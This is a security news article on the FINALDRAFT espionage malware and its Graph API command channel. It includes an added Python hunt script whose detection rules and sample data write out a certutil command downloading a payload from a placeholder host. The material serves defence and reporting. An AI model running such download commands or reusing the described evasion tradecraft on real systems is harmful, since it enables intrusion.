February 13, 2025
FINALDRAFT Malware Exploits Microsoft Graph API for Espionage on Windows and Linux

Feb 13, 2025 | Ravie Lakshmanan | Malware / Cyber Espionage

Threat hunters have shed light on a new campaign targeting the foreign ministry of an unnamed South American nation with bespoke malware capable of granting remote access to infected hosts.

The activity, detected in November 2024, has been attributed by Elastic Security Labs to a threat cluster it tracks as REF7707. Some of the other targets include a telecommunications entity and a university, both located in Southeast Asia.

“While the REF7707 campaign is characterized by a well-engineered, highly capable, novel intrusion set, the campaign owners exhibited poor campaign management and inconsistent evasion practices,” security researchers Andrew Pease and Seth Goodwin said in a technical analysis.

The exact initial access vector used in the attacks is currently not clear, although it has been observed that Microsoft’s certutil application is used to download additional payloads from a web server associated with the Foreign Ministry.

The certutil commands used to retrieve the suspicious files have been found to be executed via the Windows Remote Management’s Remote Shell plugin (WinrsHost.exe) from an unknown source system on a connected network.

“It indicates that attackers already possessed valid network credentials and were using them for lateral movement from a previously compromised host in the environment,” the researchers noted.

The first of the files to be executed is a malware named PATHLOADER that allows for the execution of encrypted shellcode received from an external server. The extracted shellcode, dubbed FINALDRAFT, is subsequently injected into the memory of a newly spawned “mspaint.exe” process.
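As an added illustration (not code from the article or from Elastic's report), the following Python hunt encodes the behaviours described above as simple process-creation rules: certutil launched by WinrsHost.exe, certutil with a download URL, and mspaint.exe spawned by an unexpected parent. The event fields, host names, file paths, parent baseline and URL are assumptions and the telemetry is constructed.

```python
"""Process-creation hunt for the REF7707 tradecraft described in the article.

Rules:
  1. certutil.exe whose parent is WinrsHost.exe (WinRM Remote Shell plugin).
  2. certutil.exe carrying a URL on its command line (download cradle).
  3. mspaint.exe spawned by a parent outside an assumed baseline (injection host).
Event shape is a simplified Sysmon-style process-creation record (assumption).
"""
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://\S+", re.IGNORECASE)
EXPECTED_MSPAINT_PARENTS = {"explorer.exe", "svchost.exe"}  # assumed baseline


@dataclass(frozen=True)
class ProcEvent:
    host: str
    image: str          # full path of the created process
    parent_image: str   # full path of the parent process
    command_line: str


def _name(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify(ev: ProcEvent) -> list:
    """Return the names of every rule the event matches (empty if nothing fires)."""
    hits = []
    img, parent = _name(ev.image), _name(ev.parent_image)
    if img == "certutil.exe":
        if parent == "winrshost.exe":
            hits.append("certutil_via_winrs")
        if URL_RE.search(ev.command_line):
            hits.append("certutil_download_cradle")
    if img == "mspaint.exe" and parent not in EXPECTED_MSPAINT_PARENTS:
        hits.append("mspaint_unusual_parent")
    return hits


def hunt(events) -> list:
    """(host, image name, matched rules) for every event that fires at least one rule."""
    return [(e.host, _name(e.image), hits) for e in events if (hits := classify(e))]


# Constructed sample telemetry; hosts, paths and the URL are placeholders.
SAMPLE_EVENTS = [
    ProcEvent("ws01", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\WinrsHost.exe",
              r'certutil.exe -urlcache -split -f "http://placeholder.invalid/payload.rar" C:\ProgramData\p.rar'),
    ProcEvent("ws01", r"C:\Windows\System32\mspaint.exe", r"C:\Windows\explorer.exe", "mspaint.exe"),
    ProcEvent("ws02", r"C:\Windows\System32\mspaint.exe", r"C:\ProgramData\loader.exe", "mspaint.exe"),
    ProcEvent("ws02", r"C:\Windows\System32\certutil.exe", r"C:\Windows\System32\cmd.exe",
              r"certutil.exe -hashfile C:\Users\Public\report.pdf SHA256"),
]
```

Run `hunt(SAMPLE_EVENTS)` to see the two events that fire; the benign mspaint launch and the hash-only certutil use stay silent.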

Written in C++, FINALDRAFT is a full-featured remote administration tool that comes fitted with capabilities to execute additional modules on the fly and abuses the Outlook email service via the Microsoft Graph API for command-and-control (C2) purposes. It’s worth noting that the abuse of the Graph API has been previously detected in another backdoor named SIESTAGRAPH.

The communication mechanism entails parsing the commands stored in the mailbox’s drafts folder and writing the results of the execution into new draft emails for each command. FINALDRAFT registers 37 command handlers that are designed around process injection, file manipulation, and network proxy capabilities.

It’s also engineered to start new processes with stolen NTLM hashes and execute PowerShell commands in a manner such that it does not invoke the “powershell.exe” binary. Instead, it patches several APIs to evade event tracing for Windows (ETW) and launches PowerPick, a legitimate utility that’s part of the Empire post-exploitation toolkit.

ELF binary artifacts uploaded to VirusTotal from Brazil and the United States indicate the presence of a Linux variant of FINALDRAFT that features similar C2 functionality. The Linux version, for its part, can execute shell commands via popen and delete itself from the system.

“The completeness of the tools and the level of engineering involved suggest that the developers are well-organized,” the researchers said. “The extended time frame of the operation and evidence from our telemetry suggest it’s likely an espionage-oriented campaign.”
